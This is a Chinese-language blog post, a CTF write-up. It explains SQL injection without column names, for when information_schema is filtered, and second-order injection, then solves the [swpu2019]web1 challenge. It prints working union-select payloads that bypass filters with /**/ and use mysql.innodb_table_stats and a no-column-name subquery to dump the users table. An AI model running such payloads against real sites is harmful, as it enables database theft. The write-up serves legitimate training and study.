<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>
<meta name="description" content="sql注入之无名注入在我们进行sql注入的时候，有时候information_schema这个库可能会因为过滤而无法调用，这时我们就不能通过这个库来查出表名和列名。不过我们可以通过两种方法来查出表名： InnoDb引擎从MYSQL5.5.8开始，InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中，inndb增加了innodb_index_stats和innodb_table_stat">
<meta property="og:type" content="article">
<meta property="og:title" content="无列名注入">
<meta property="og:url" content="http://example.com/2021/11/14/%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="wds">
<meta property="og:description" content="sql注入之无名注入在我们进行sql注入的时候，有时候information_schema这个库可能会因为过滤而无法调用，这时我们就不能通过这个库来查出表名和列名。不过我们可以通过两种方法来查出表名： InnoDb引擎从MYSQL5.5.8开始，InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中，inndb增加了innodb_index_stats和innodb_table_stat">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2021/11/14/Zke9TQvxtF2W4mg.png">
<meta property="og:image" content="https://i.loli.net/2021/11/14/vIu7FfEXd65pyJQ.png">
<meta property="og:image" content="https://i.loli.net/2021/11/14/pw2KetuCxYDmOL7.png">
<meta property="og:image" content="https://i.loli.net/2021/11/14/B3xUqzE9JAVnvfl.png">
<meta property="og:image" content="https://i.loli.net/2021/11/14/7n9YZdX4VzyxeaA.png">
<meta property="og:image" content="https://i.loli.net/2021/11/16/kJuyev3L5zHcio8.png">
<meta property="og:image" content="https://i.loli.net/2021/11/16/siyhoeba1frqQL3.png">
<meta property="og:image" content="https://i.loli.net/2021/11/16/Nbk9mvRZyiJg5t6.png">
<meta property="article:published_time" content="2021-11-14T13:04:50.000Z">
<meta property="article:modified_time" content="2022-02-23T04:50:55.168Z">
<meta property="article:author" content="发福的小菜狗">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/11/14/Zke9TQvxtF2W4mg.png">


<link rel="canonical" href="http://example.com/2021/11/14/%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2021/11/14/%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5/","path":"2021/11/14/无列名注入/","title":"无列名注入"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>无列名注入 | wds</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="wds" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">wds</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E4%B9%8B%E6%97%A0%E5%90%8D%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">sql注入之无名注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">二次注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#swpu2019-web1"><span class="nav-number">3.</span> <span class="nav-text">[swpu2019]web1</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">发福的小菜狗</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">32</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/11/14/%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="发福的小菜狗">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="wds">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          无列名注入
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2021-11-14 21:04:50" itemprop="dateCreated datePublished" datetime="2021-11-14T21:04:50+08:00">2021-11-14</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">Edited on</span>
        <time title="Modified: 2022-02-23 12:50:55" itemprop="dateModified" datetime="2022-02-23T12:50:55+08:00">2022-02-23</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/sql%E6%B3%A8%E5%85%A5/" itemprop="url" rel="index"><span itemprop="name">sql注入</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="sql注入之无名注入"><a href="#sql注入之无名注入" class="headerlink" title="sql注入之无名注入"></a>sql注入之无名注入</h1><p>在我们进行sql注入的时候，有时候information_schema这个库可能会因为过滤而无法调用，这时我们就不能通过这个库来查出表名和列名。不过我们可以通过两种方法来查出表名：</p>
<p>InnoDb引擎<br>从MYSQL5.5.8开始，InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中，inndb增加了innodb_index_stats和innodb_table_stats两张表，这两张表中都存储了数据库和其数据表的信息，但是没有存储列名。<br>sys数据库<br>在5.7以上的MYSQL中，新增了sys数据库，该库的基础数据来自information_schema和performance_chema，其本身不存储数据。可以通过其中的schema_auto_increment_columns来获取表名。<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_46330722/article/details/109605941">文章截取csdn</a></p>
<h1 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h1><p>指已经被存入数据库的值被误解读为错误指令。</p>
<p>一般出现在读取值的过程中有各种过滤，然后对读取数据库时不进行过滤或转义。</p>
<h1 id="swpu2019-web1"><a href="#swpu2019-web1" class="headerlink" title="[swpu2019]web1"></a>[swpu2019]web1</h1><p>先注册账号</p>
<p>然后就可以上传广告（上传广告就是把值存入数据库）</p>
<p>然后分别测试在广告名和广告内容注入，发现广告名可以注入，但是有很多的过滤。</p>
<p><img src="https://i.loli.net/2021/11/14/Zke9TQvxtF2W4mg.png" alt="QQ截图20211114220531.png"></p>
<p>用/**/来代替空格，利用union select 查出字段数和回显</p>
<p><img src="https://i.loli.net/2021/11/14/vIu7FfEXd65pyJQ.png" alt="QQ截图20211114222329.png"></p>
<p>发现2，3位置回显，</p>
<p><img src="https://i.loli.net/2021/11/14/pw2KetuCxYDmOL7.png" alt="QQ截图20211114222514.png"></p>
<p>查库</p>
<p><img src="https://i.loli.net/2021/11/14/B3xUqzE9JAVnvfl.png" alt="QQ截图20211114223621.png"></p>
<p>查表（出现没有）</p>
<p><img src="https://i.loli.net/2021/11/14/7n9YZdX4VzyxeaA.png" alt="QQ截图20211114223712.png"></p>
<p>-1’union/<strong>/select/</strong>/1,2,group_concat(table_name)/<strong>/from/</strong>/information_schema.tables/<strong>/where/</strong>/table.schema=database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&amp;&amp;’1’=’1</p>
<p>这里的information_schema被过滤了不能用，所以我们要换一个库来查table_name和column_name</p>
<p>-1’union/<strong>/select/</strong>/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/<strong>/from/</strong>/mysql.innodb_table_stats/<strong>/where/</strong>/database_name=database()&amp;&amp;’1’=’1</p>
<p>但是这个引擎没有存列名</p>
<p>所以要利用无列名注入。</p>
<p>-1’union/<strong>/select/</strong>/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/<strong>/from/</strong>/mysql.innodb_table_stats/<strong>/where/</strong>/database_name=database()&amp;&amp;’1’=’1</p>
<p>用mysql.innodb_table_stats代替information_schema.tables查出表</p>
<p><img src="https://i.loli.net/2021/11/16/kJuyev3L5zHcio8.png" alt="QQ截图20211116221604.png"></p>
<p>-1’/<strong>/union/</strong>/select/<strong>/1,(select/</strong>/group_concat(<code>2</code>)/<strong>/from/</strong>/(select/<strong>/1,2,3/</strong>/union/<strong>/select*from/</strong>/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&amp;&amp;’1’=’1</p>
<p><img src="https://i.loli.net/2021/11/16/siyhoeba1frqQL3.png" alt="QQ截图20211116222056.png"></p>
<p>查询</p>
<p>-1’/<strong>/union/</strong>/select/<strong>/1,(select/</strong>/group_concat(<code>3</code>)/<strong>/from/</strong>/(select/<strong>/1,2,3/</strong>/union/<strong>/select*from/</strong>/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&amp;&amp;’1’=’1’</p>
<p><img src="https://i.loli.net/2021/11/16/Nbk9mvRZyiJg5t6.png" alt="QQ截图20211116222453.png"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/11/10/less17/" rel="prev" title="less17-">
                  <i class="fa fa-chevron-left"></i> less17-
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/11/19/wp/" rel="next" title="finalsql">
                  finalsql <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">发福的小菜狗</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
